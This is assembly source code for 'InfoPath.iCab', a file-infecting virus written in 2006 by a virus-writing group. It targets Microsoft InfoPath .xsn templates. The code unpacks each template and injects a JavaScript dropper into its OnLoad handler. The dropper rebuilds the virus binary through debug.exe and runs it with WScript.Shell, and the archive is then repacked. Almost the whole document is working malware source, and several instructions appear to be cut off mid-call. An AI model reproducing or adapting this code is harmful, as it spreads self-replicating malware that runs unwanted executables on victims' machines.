by Second Part To Hell
;;  InfoPath.iCab
;;  by Second Part To Hell
;;  written in February-March 2006
;;  This virus is a binary macro-virus for Infopath.
;;  Microsoft Office Infopath is (as the name already says it) in the Office-packet
;;  since Office 2003.
;;  The virus infects any .xsn file with JS macros (standard). It hooks the
;;  XDocument::OnLoad Function. If this function does not exist, the file stays uninfected.
;;  A .xsn file is a cabinet-archive including several files (like .gifs, .xsf, .html, .js).
;;  My virus searchs for any .xsn file in the current directory.
;;  When it finds an file:
;;  -> extracts the file
;;  -> searchs the script.js (exists as standard)
;;  -> searchs the OnLoad-Function
;;  -> Write a dropper and itself as hex-values to the file
;;  -> Closes the file
;;  -> Make a new cabinet file
;;  More about Infopath and viruses, see my article about it in rRlf#7.
;;  Nothing more to say - see the (commented) source now :)

include '..\fasm\INCLUDE\'

        xsn_function_data_length        EQU     xsn_function_data_end-xsn_function_data
        xsn_dropper_code_before_length  EQU     xsn_dropper_code_b_end-xsn_dropper_code_before
        xsn_dropper_code_after_length   EQU     xsn_dropper_code_a_end-xsn_dropper_code_after
        extrac32_data_length            EQU     end_extrac32_data-extrac32_data
        MAX_PATH                        EQU     256
        dwMyFileName            dd 0x0
        hCreateFileHandle       dd 0x0
        hCreFiMapping           dd 0x0

        stTempFile              db 'iCab.tmp', 0x0
        stTempDir               db 'iCab', 0x0
        stDotDot                db '..', 0x0
        stAnyFile               db '*.*', 0x0
        hSearchHandleAnyFile    dd 0x0

        stMakeCAB               db 'makecab /F '
        stDirective             db 'iCabdire.txt', 0x0
        stDirectiveDir          db 'Disk1', 0x0

        stDirectiveTrash1       db 'setup.inf',0x0
        stDirectiveTrash2       db 'setup.rpt',0x0

        infectedCab             db 'disk1/',0x0
        stScriptJS              db 'script.js',0x0
        hCreFiScriptJS          dd 0x0
        dwFileSizeScriptJS      dd 0x0
        hCreFiMapScriptJS       dd 0x0
        dwMapViewScriptJS       dd 0x0
        dwStartOfOnLoad         dd 0x0

        hDirectiveFile          dd 0x0
        dwFileSize              dd 0x0
        dwMapViewOffset         dd 0x0
        dwCounter               dd 0x0
        dwMemAlloc              dd 0x0
        dwMemAlloc2             dd 0x0
        dwSplitCounter          dd 0x300
        stSplitCounter          db '0110'
        hex_code_length2        dd 0x0
        hDirectiveSearch        dd 0x0

        dwDirectiveCounter      dd 0x0

        trash_counter           dd 0x0
        bin2hex_1               db 0x0
        bin2hex_2               db 0x0
                                db 0x0

        byteswritten            dd 0x0

        hex_code_length         dd 0x0
        FALSE_F                 dd 0x0

        trash:   times 8 dd 0x0

        xsn_extention           db '*.xsn', 0x0
        xsn_search_handle       dd 0x0
        xsn_function_data       db 'function XDocument::OnLoad(eventObj)'

        xsn_dropper_code_before db 'var fso,shell,nxln,wsc,filee;'
                                db 'nxln=String.fromCharCode(13,10);'
                                db 'fso=new ActiveXObject("Scripting.FileSystemObject");'
                                db 'file=fso.CreateTextFile("C:\\iCab.txt", true);'
                                db 'file.write("e 0100'
        xsn_dropper_code_after  db '"+nxln+"rcx"+nxln+"2000"+nxln+"n C:\\iCab.dmp"+nxln+"w"+nxln+"q");file.Close();'
                                db 'shell=new ActiveXObject("WScript.Shell");filee=fso.CreateTextFile("C:\\test.bat");'
                                db 'filee.Write("debug<C:\\iCab.txt"+nxln+"ren C:\\iCab.dmp C:\\iCab.exe");'
                                db 'filee.Close();'
                                db 'shell.Run("C:\\test.bat");'
                                db "var msg;var rand=Math.round(Math.random()*10);"
                                db "if (rand==0) { msg='Let the bells of freedom ring!\n - (Magician'+String.fromCharCode(39)+'s Birthday by Uriah Heep)'; }"
                                db "if (rand==1) { msg='No Gods, No Masters - Against all Authority: ANARCHISM!'; }"
                                db "if (rand==2) { msg='Freedom is just another word for nothing left to lose!\n - (Me And Bobby McGee by Janis Joplin)'; }"
                                db "if (rand==3) { msg='I'+String.fromCharCode(39)+'m not a prisoner - I'+String.fromCharCode(39)+'m a FREE man!\n - (The Prisoner by Iron Maiden)'; }"
                                db "if (rand==4) { msg='Sometime they will give a war and nobody will come!\n - (by Carl Sandberg)'; }"
                                db "if (rand==5) { msg='Fighting for peace is like fucking for virginity!'; }"
                                db "if (rand==6) { msg='The easiest way to gain control of the population is to carry out acts of terror the public will clamor for such laws if the personal security is threatened.\n - (by Joseph Stalin)'; }"
                                db "if (rand==7) { msg='Our Word is Our Weapon.\n - (by Subcomandante Marcos)'; }"
                                db "if (rand==8) { msg='I do not know with what weapons World War III will be fought, but World War IV will be fought with sticks and stones.\n - (by Albert Einstein)'; }"
                                db "if (rand==9) { msg='Imagine all the people living life in PEACE!\n - (Imagine by John Lennon)'; }"
                                db "if (rand==9) { msg='This proof-of-concept Infopath virus has been done by [Second Part To Hell/rRlf]\n\n'; }"
                                db "XDocument.UI.Alert(msg);"
                                db 'if (fso.FileExists("C:\\iCab.exe")) { fso.DeleteFile("C:\\iCab.exe"); }'
                                db 'if (fso.FileExists("C:\\test.bat")) { fso.DeleteFile("C:\\test.bat"); }'
                                db 'if (fso.FileExists("C:\\ICAB.DMP")) { fso.CopyFile("C:\\ICAB.DMP","C:\\iCab.exe"); }'
                                db 'if (fso.FileExists("C:\\ICAB.DMP")) { fso.DeleteFile("C:\\ICAB.DMP"); }'
                                db 'shell.Run("C:\\iCab.exe");'

        dwMemAllocInf           dd 0x0

        extrac32_data           db '\extrac32.exe /e /a "'

        system_dir_buffer:      times MAX_PATH db 0x0
        extrac32_data_buffer:   times 256      db 0x0
        end_of_system_dir       dd 0x0

        dwFileAttributes   dd ?
        ftCreationTime     FILETIME
        ftLastAccessTime   FILETIME
        ftLastWriteTime    FILETIME
        nFileSizeHigh      dd ?
        nFileSizeLow       dd ?
        dwReserved0        dd ?
        dwReserved1        dd ?
        cFileName:         times 260 db 0x0
        cAlternateFileName:times  14 db 0x0

        _dwFileAttributes    dd ?
        _ftCreationTime      FILETIME
        _ftLastAccessTime    FILETIME
        _ftLastWriteTime     FILETIME
        _nFileSizeHigh       dd ?
        _nFileSizeLow        dd ?
        _dwReserved0         dd ?
        _dwReserved1         dd ?
        _cFileName:          times 260 db 0x0
        _cAlternateFileName: times 14 db 0x0
;end WIN32_FIND_DATA_2

  StartUp_struct_cb              dd 0
  StartUp_struct_lpReserved      dd 0
  StartUp_struct_lpDesktop       dd 0
  StartUp_struct_lpTitle         dd 0
  StartUp_struct_dwX             dd 0
  StartUp_struct_dwY             dd 0
  StartUp_struct_dwXSize         dd 0
  StartUp_struct_dwYSize         dd 0
  StartUp_struct_dwXCountChars   dd 0
  StartUp_struct_dwYCountChars   dd 0
  StartUp_struct_dwFillAttribute dd 0
  StartUp_struct_dwFlags         dd 0
  StartUp_struct_wShowWindow     dw 0
  StartUp_struct_cbReserved2     dw 0
  StartUp_struct_lpReserved2     dd 0
  StartUp_struct_hStdInput       dd 0
  StartUp_struct_hStdOutput      dd 0
  StartUp_struct_hStdError       dd 0

  PROCESS_INFORMATION_hProcess    dd 0
  PROCESS_INFORMATION_hThread     dd 0

        invoke  GetCommandLine                          ; Get my own filename
        inc     eax                                     ; Delete first '"'
        mov     [dwMyFileName], eax                     ; Save my filename

        inc     eax                                     ; Increase pointer
        cmp     byte [eax], '.'                         ; Check for dot
    jne check_for_dot                                   ; If not found, search next

        mov     byte [eax+4], 0x0                       ; Delete last '"'

        invoke  CopyFile, \                             ; Create a temp file
                [dwMyFileName], \
                stTempFile, \
                FALSE                                   ; Overwrite if exist

        invoke  CreateFile, \                           ; Open the own file
                stTempFile, \
                GENERIC_READ or GENERIC_WRITE, \
                0x0, \
                0x0, \
                OPEN_EXISTING, \
                FILE_ATTRIBUTE_NORMAL, \
        mov     [hCreateFileHandle], eax

        invoke  GetFileSize, \                          ; Get the filesize of the own file
                [hCreateFileHandle], \
        mov     [dwFileSize], eax

        invoke  CreateFileMapping, \                    ; Create Filemapping of own file
                [hCreateFileHandle], \
                0x0, \
                PAGE_READWRITE, \
                0x0, \
                [dwFileSize], \
        mov     [hCreFiMapping], eax

        invoke  MapViewOfFile, \                        ; Map the own file into memory
                [hCreFiMapping], \
                FILE_MAP_ALL_ACCESS, \
                0x0, \
                0x0, \
        mov     [dwMapViewOffset], eax

        invoke  VirtualAlloc, \                         ; Get 64KB Memory
                0x0, \
                0x10000, \
                0x1000, \
        mov     [dwMemAlloc], eax

        mov     ebx, [dwCounter]                        ; ebx=Counter
        add     ebx, [dwMapViewOffset]                  ; ebx=MapView+counter
        mov     al, byte [ebx]                          ; al=[MapView+counter]

        call    MakeToHex                               ; Make al to Hex (retrunvalue in ax)
        push    ax                                      ; Save ax (hex number)
        xor     eax, eax                                ; eax=0x0
        mov     eax, [dwCounter]                        ; eax=dwCounter
        mov     bx, 3                                   ; bx=5
        mul     bx                                      ; DX:AX=AX*BX
        add     eax, [dwMemAlloc]                       ; eax=3*counter+MemoryAddresse
        mov     byte [eax],' '                          ; [eax]="0x",0x0
        xchg    ebx, eax                                ; ebx=eax
        pop     ax                                      ; Get Hex-Number from Stack
        mov     word [ebx+1], ax                        ; [ebx]= Hex number - for example: "0xFF"

        inc     [dwCounter]                             ; Increase Counter
        mov     eax, [dwFileSize]                       ; eax=Filesize
        cmp     [dwCounter], eax                        ; Compare Counter with Filesize
   jl   MakeToHex_loop                                  ; If less, continue converting

        mov     eax, [dwCounter]
        mov     bx, 3
        mul     bx
        mov     [hex_code_length], eax                  ; Save length of hex-code

        invoke  UnmapViewOfFile, \                      ; Close MapView

        invoke  CloseHandle, \                          ; Close CreateMap

        invoke  CloseHandle, \                          ; Close Temp File

        invoke  DeleteFile, \                           ; Delete Temp File

        invoke  VirtualAlloc, \                         ; Get 64KB Memory
                0x0, \
                0x10000, \
                0x1000, \
        mov     [dwMemAlloc2], eax

        call    CreateDumpCode                          ; Create The Hex-Dump code

        invoke  CreateDirectory, \                      ; Create Temp Directory
                stTempDir, \

        invoke  FindFirstFile, \                        ; Find First *.xsn File
                xsn_extention, \
        mov     [xsn_search_handle], eax                ; Save Search-Handle
        cmp     eax, INVALID_HANDLE_VALUE               ; No File Found?
        je      EndOfVirus                              ; Jmp To End Of Virus


        mov     [dwDirectiveCounter], 0x0

        mov     eax, system_dir_buffer
        mov     ecx, MAX_PATH
        call    FillBufferWithZero

        call    CopyVictimToTempDir                     ; Copy the victim to the temp-Directory

        invoke  CreateFile, \
                stDirective, \
                GENERIC_READ or GENERIC_WRITE, \
                0x0, \
                0x0, \
                CREATE_ALWAYS, \
                FILE_ATTRIBUTE_NORMAL, \
        mov     [hDirectiveFile], eax                   ; The directive File will be needed for creating the .cab

        invoke  SetCurrentDirectory, \                  ; Set the current Directory to temp-Directory

        call    GenerateExtrac32String                  ; Generate the extrac32 String

        invoke  CreateProcess, \                        ; Execute the extrac32-string
                0x0, \                                  ; Now the extracted version of the victim is in the temp-direcory
                system_dir_buffer, \
                0x0, \
                0x0, \
                FALSE, \
                0x0, \
                0x0, \
                0x0, \
                STARTUPINFO_struct, \

        invoke  Sleep, \                                ; Wait 0.5 Seconds - Wait for the extrac32.exe

        invoke  DeleteFile, \                           ; Delete the temporary copy of the victim in 'iCab\'

        invoke  CreateFile, \                           ; Open script.js
                stScriptJS, \
                GENERIC_READ or GENERIC_WRITE, \
                0x0, \
                0x0, \
                OPEN_EXISTING, \
                FILE_ATTRIBUTE_NORMAL, \
        mov     [hCreFiScriptJS], eax
        cmp     eax, INVALID_HANDLE_VALUE
        je      DontInfect

        invoke  GetFileSize, \                          ; Get the filesize of the own file
                [hCreFiScriptJS], \
        mov     [dwFileSizeScriptJS], eax

        invoke  CreateFileMapping, \                    ; Create Filemapping of own file
                [hCreFiScriptJS], \
                0x0, \
                PAGE_READWRITE, \
                0x0, \
                [dwFileSizeScriptJS], \
        mov     [hCreFiMapScriptJS], eax

        invoke  MapViewOfFile, \                        ; Map the own file into memory
                [hCreFiMapScriptJS], \
                FILE_MAP_ALL_ACCESS, \
                0x0, \
                0x0, \
        mov     [dwMapViewScriptJS], eax

        call    SearchOnLoadInScriptJS                  ; Search for the OnLoad-Function entry
        call    CheckIfAlreadyInfected                  ; Check if already infected
        call    Generate_infected_code                  ; Generate the fully infected code

        invoke  UnmapViewOfFile, \

        invoke  CloseHandle, \

        invoke  CloseHandle, \

        invoke  DeleteFile, \

        invoke  CreateFile, \
                stScriptJS, \
                GENERIC_READ or GENERIC_WRITE, \
                0x0, \
                0x0, \
                CREATE_ALWAYS, \
                FILE_ATTRIBUTE_NORMAL, \
        mov     [hCreFiScriptJS], eax

        mov     ecx, [dwFileSizeScriptJS]
        add     ecx, xsn_dropper_code_before_length
        add     ecx, xsn_dropper_code_after_length
        add     ecx, [hex_code_length2]

        invoke  WriteFile, \                    ; Write the script.JS including the virus
                [hCreFiScriptJS], \
                [dwMemAllocInf], \
                ecx, \
                FALSE_F, \

        invoke  CloseHandle, \

        invoke  CloseHandle, \
                [hCreFiScriptJS]                ; Close the script.JS File

        invoke  FindFirstFile, \                ; Find all files of the xsn - for compress them again
                stAnyFile, \                    ; used for the directive-file
        mov     [hDirectiveSearch], eax

        call    MakeDirectiveFile

        invoke  FindClose, \

        invoke  WriteFile, \                    ; Write the content of the Directive-File for makecab
                [hDirectiveFile], \
                [dwMemAllocInf], \
                [dwDirectiveCounter], \
                FALSE_F, \

        invoke  CloseHandle, \

        invoke  SetCurrentDirectory, \

        invoke  CreateProcess, \                        ; Execute the makecab-string
                0x0, \                                  ; Now the .cab file is in "disk1/"
                stMakeCAB, \
                0x0, \
                0x0, \
                FALSE, \
                0x0, \
                0x0, \
                0x0, \
                STARTUPINFO_struct, \

        invoke  Sleep, \                                ; You have 1 second for running

        invoke  DeleteFile, \                           ; Delete the Setup-File (setup.inf)

        invoke  DeleteFile, \                           ; Delete the Setup-File (setup.rpt)

        invoke  DeleteFile, \

        invoke  CopyFile, \
                infectedCab, \
                cFileName, \

        invoke  DeleteFile, \

        mov     byte [infectedCab+5], 0x0

        invoke  RemoveDirectory, \

        mov     byte [infectedCab+5], '/'

        invoke  SetCurrentDirectory, \

jmp     DontInfect

Not_Infect:                                     ; Jump Over!!!!

        invoke  UnmapViewOfFile, \

        invoke  CloseHandle, \

        invoke  CloseHandle, \

        invoke  CloseHandle, \

        invoke  DeleteFile, \

        call    DeleteAnyFileInDirectory                ; Delete any file in the temp Directory (because only empty Dirs can be deleted

        invoke  SetCurrentDirectory, \                  ; Set current directory to the old one

        invoke  FindNextFile, \
                [xsn_search_handle], \
        cmp     eax, 0x0
        jne     infection_of_xsn_file

        invoke  FindClose, \                            ; Close the Find

        invoke  RemoveDirectory, \                      ; Delete the temp Directory

        invoke  VirtualFree, \
                dwMemAlloc, \
                0x0, \
                MEM_RELEASE, \

        invoke  ExitProcess, \

; Convert a binary byte to a hex-number
; In:  al = binary byte
; Out: ax = hex-value
; Nothing else changed
        mov     word [bin2hex], 0x3030          ; Code of "00"
        mov     ah, al                          ; ah=al
        and     al, 0x0F                        ; al=0000 ????

        push    binary_to_hex_RJ_1              ; Offset of return jmp to stack

        cmp     al, 0x0A                        ; Is al > 10
        jge     bin2hex_inc_al                  ; If yes, increase AL:
                                                ; ASCII '0' = 0x30
                                                ; ASCII '9' = 0x39
                                                ; ASCII 'A' = 0x41
                                                ; 'A'-'9' = 0x41-0x39 = 8-1 = 7

        mov     [trash_counter], ebx             ; We did not need the retrun value
        pop     ebx                              ; Get it back
        mov     ebx, [trash_counter]             ; Restore ebx

        add     byte [bin2hex_2], al            ; '0'+al

        shr     ah, 4                           ; ah = ???? ---- -> 0000 ????
        mov     al, ah                          ; al = ah

        push    binary_to_hex_RJ_2

        cmp     al, 0x0A
        jge     bin2hex_inc_al

        mov     [trash_counter], ebx
        pop     ebx
        mov     ebx, [trash_counter]
        add     byte [bin2hex_1], al

        mov     ax, word [bin2hex]              ; HEX-value to ax

        add     al, 7                           ; al += 7  <- If al > "9" then ASCII-number + 7

; Removed all files in current Directory
; In: Nothing
; Out: Anything changed

        invoke  FindFirstFile, \                ; Find *.* files
                stAnyFile, \
        mov     [hSearchHandleAnyFile], eax     ; Save Searchhandle

        invoke  DeleteFile, \                   ; Delete any found file

        invoke  FindNextFile, \                 ; Search next file
                [hSearchHandleAnyFile], \
        cmp     eax, 0x0
   jne  DeleteTempDirFiles

        invoke  FindClose, \                    ; Close Filesearching

; Generate String to extract the xsn file: %system%\extrac32.exe /e /a "%victim%"
; cFileName = Filename of victim
; Out: Anything changed

        invoke  GetSystemDirectory, \           ; Get the path of System Directory
                system_dir_buffer, \

        xor     ecx, ecx                        ; ecx=0x0
   find_end_of_system_dir:                      ; Find end of System-Directory-Path
        inc     ecx                             ; Increase ecx
        mov     eax, ecx                        ; eax=ecx
        add     eax, system_dir_buffer          ; eax=system_dir_buffer+counter
        mov     al, byte [eax]                  ; al=[system_dir_buffer+counter]
        cmp     al, 0x0                         ; al=0x0?
   jne  find_end_of_system_dir                  ; If not, continue searching

        mov     eax, system_dir_buffer          ; eax=system_dir_buffer
        add     eax, ecx                        ; eax=End of system dir path
        mov     [end_of_system_dir], eax        ; Save eax

        mov     ecx, extrac32_data_length       ; Write extrac32_data after system-path
        mov     esi, extrac32_data
        mov     edi, [end_of_system_dir]
        rep     movsb                           ; Write! system_dir may be 'C:\Windows\System\extrac32.exe /e /a "' now

        xor     ecx, ecx                        ; ecx=0x0
   find_end_of_filename:                        ; Find end of filename of victim
        inc     ecx                             ; Increase counter
        mov     eax, ecx                        ; eax=counter
        add     eax, cFileName                  ; eax=Victim-filename+counter
        mov     al, byte [eax]                  ; al=byte [Victim-filename+counter]
        cmp     al, 0x0                         ; al=0x0?
   jne  find_end_of_filename                    ; If not, continue searching

        mov     esi, cFileName                  ; Write filename to end of system-string
        mov     edi, [end_of_system_dir]
        add     edi, extrac32_data_length
        rep     movsb                           ; Write! system_dir may be 'C:\Windows\System\extrac32.exe /e /a "victim.xsn'

        mov     byte [edi], '"'                 ; system_dir may be 'C:\Windows\System\extrac32.exe /e /a "victim.xsn"'

; Copy the victim File to "iCab\"
; cFileName=Name Of Victim
; Anything changed
        mov     dword [cFileName-5], 'iCab'
        mov     byte [cFileName-1], '\'

        invoke  CopyFile, \
                cFileName, \
                cFileName-5, \

; Writes offset of OnLoad-Function to [dwStartOfOnLoad]
; [dwMapViewScriptJS]=Pointer to MapView Of the Script.JS
; [xsn_function_data]=Data of function-start
; xsn_function_data_length= Length of OnLoad-function-string
        xor     ecx, ecx
        mov     eax, [dwMapViewScriptJS]        ; eax=MapView of script.js
        add     eax, ecx                        ; eax=current byte of MapView of script.js
        mov     eax, dword [eax]                ; eax=4 Bytes of MapView
        inc     ecx                             ; Increase the counter
        cmp     ecx, dwFileSizeScriptJS         ; End of File
        jne     con_OnLoadLoop2                 ; If not EOF, continue searching
        pop     eax                             ; Remove trash from stack
        jmp     Not_Infect                      ; Close all and find next file
        cmp     eax, "func"                     ; Is the current position a function?
   jne  searchOnLoadLoop                        ; If not, continue searching

        mov     eax, [dwMapViewScriptJS]
        add     eax, ecx

        xor     edx, edx
        mov     eax, [dwMapViewScriptJS]        ; eax=MapView of script.js
        add     eax, ecx                        ; eax=current byte if MapView of script.js
        mov     al, byte [eax]                  ; al=One byte of Mapview of script.js
        inc     ecx                             ; Increase counter
        inc     edx                             ; Second counter
        mov     ebx, xsn_function_data          ; ebx=xsn function_data
        add     ebx, edx                        ; ebx=current byte of xsn function data
        mov     bl, byte [ebx]                  ; bl=One byte of xsn function data
        cmp     al, bl                          ; compare if they are the same
        jne     searchOnLoadLoop                ; If not the same, continue searching
        cmp     edx, xsn_function_data_length-1 ; End of the string?
   jl   continue_searchOnLoad_loop              ; If not, continue searching

        mov     eax, [dwMapViewScriptJS]
        add     eax, ecx
        inc     eax
        cmp     byte [eax], '{'
   jne  con_searchOL_2

        inc     eax
        mov     [dwStartOfOnLoad], eax         ; Save the entry of the OnLoad-Function

        invoke  VirtualAlloc, \
                0x0, \
                0x12000, \
                0x1000, \
        mov     [dwMemAllocInf], eax

        mov     ecx, [dwStartOfOnLoad]
        sub     ecx, [dwMapViewScriptJS]
        mov     esi, [dwMapViewScriptJS]
        mov     edi, [dwMemAllocInf]
        rep     movsb

        mov     ecx, xsn_dropper_code_before_length
        mov     esi, xsn_dropper_code_before
;       mov     edi, [dwMemAllocInf+length of StartCodeOfVictim]           ; Already right value
        rep     movsb

        mov     ecx, [hex_code_length2]
        mov     esi, [dwMemAlloc2]
        rep     movsb

        mov     ecx, xsn_dropper_code_after_length
        mov     esi, xsn_dropper_code_after
        rep     movsb

        mov     ebx, [dwStartOfOnLoad]
        sub     ebx, [dwMapViewScriptJS]
        mov     ecx, [dwFileSizeScriptJS]
        sub     ecx, ebx
        mov     esi, [dwStartOfOnLoad]
        rep     movsb

; In: [dwMemAlloc] = Hex Dump without breaks
;     [hex_code_length] = Length of Hex Dump
;     [dwSplitCounter] = Current position
;     [stSplitCounter] = Current position in ASCII
; Out: [dwMemAlloc2] = Hex Dump with breaks
;      [hex_code_length2] = Length of Hex Dump
; Splittes Hex Dump into 0x100-Bytes for debugging

        mov     ecx, 0x30
        mov     esi, [dwMemAlloc]
        add     esi, [dwSplitCounter]
        sub     esi, 0x300
        mov     edi, [dwMemAlloc2]
        add     edi, [hex_code_length2]
        rep     movsb

        mov     dword [edi], '"+nx'
        mov     dword [edi+4], 'ln+"'
        mov     word [edi+8], 0x2065         ; LineBreak + "e "
        mov     eax, dword [stSplitCounter]
        mov     dword [edi+10], eax
        add     [dwSplitCounter], 0x30
        add     [hex_code_length2], 0x3E

        call    Increase_stSplitCounter

        mov     eax, [dwSplitCounter]
        sub     eax, 0x300
        cmp     eax, [hex_code_length]
        jl      CreateDumpCode

        mov     ecx, 0x30
        mov     esi, [dwMemAlloc]
        add     esi, [dwSplitCounter]
        sub     esi, 0x330
        mov     edi, [dwMemAlloc2]
        add     edi, [hex_code_length2]
        rep     movsb

        sub     [hex_code_length2], 0xE

        xor     dx, dx
        mov     eax, [dwSplitCounter]
        add     eax, 0x30
        mov     bx, 3
        div     bx
        push    ax                      ; Save ax
        call    MakeToHex
        mov     word [stSplitCounter+2], ax
        pop     ax
        xchg    al, ah
        call    MakeToHex
        mov     word [stSplitCounter], ax

; In: eax=Pointer to string
; Out: eax=Pointer to End Of String

        inc     eax
        cmp     byte [eax], 0x0
        jne     Search_End_Of_String

        cmp     byte [_cFileName], '.'          ; Is it '.' or '..'?
        je      MDF_FNF                         ; If yes: Dont write that to directive file
        cmp     dword [_cFileName], 'iCab'      ; Is it the Directive File itself?
        je      MDF_FNF                         ; Also dont write that

        mov     eax, _cFileName
        call    Search_End_Of_String

        mov     dword [_cFileName-5], 'iCab'
        mov     byte [_cFileName-1], '\'

        mov     word [eax], 0x0A0D

        mov     ecx, eax
        add     ecx, 7                          ; "iCab\".length + 0x0A0D.length
        sub     ecx, _cFileName

        add     [dwDirectiveCounter], ecx

        mov     esi, _cFileName-5
        mov     edi, [dwMemAllocInf]
        add     edi, [dwDirectiveCounter]
        sub     edi, ecx
        rep     movsb

        invoke  FindNextFile, \
                [hDirectiveSearch], \
        cmp     eax, 0x0
        jne     MakeDirectiveFile

; Search for a string 'iCab'.
; If not infected, return at the usual way
; If infected, get the return value from stack (trash) and jmp to Not_infect
        mov     ebx, [dwMapViewScriptJS]
        xor     ecx, ecx

        cmp     ecx, [dwFileSizeScriptJS]
        je      ret_CheckIfAlreadyInfected

        mov     eax, ebx
        add     eax, ecx
        mov     eax, dword [eax]

        inc     ecx

        cmp     eax, 'iCab'
    jne loop_CheckIfAlreadyInfected

        pop     eax
        jmp     Not_Infect


; In: ecx: Size of Buffer
;     eax: Pointer to buffer

      mov       ebx, eax
      add       ebx, ecx
      mov       byte [ebx], 0x0
      loop      FillBufferWithZero

.end start